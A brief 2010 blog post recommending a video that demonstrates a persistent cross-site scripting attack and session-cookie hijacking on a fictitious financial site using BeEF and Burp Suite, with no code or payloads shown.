Persistent Cross-Site Scripting (XSS) Demo

If you ever wanted to know how cross-site scripting works, look no further. The video was created by Aleksander Gorkowienko, a database and application security expert with the company 7safe.

In “Cross-Site Scripting Explained”, Aleksander simulates an XSS attack against a fictitious online financial company. He demonstrates how a hacker could jump from one authenticated user (using a password and a PIN) to another using PHP Session cookies.

In the attack, Aleksander uses the Browser Exploitation Framework (BeEF), JavaScript and the Web Application security testing platform Burp Suite. I haven’t played with BeEF in a while, so it was good to see it in action again.

This demonstrates why it is important to test web applications for vulnerabilities like XSS.  The video is definitely a must see!

For more information, check out Aleksander’s website IT Security Lab.

~ by D. Dieterle on October 30, 2010.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: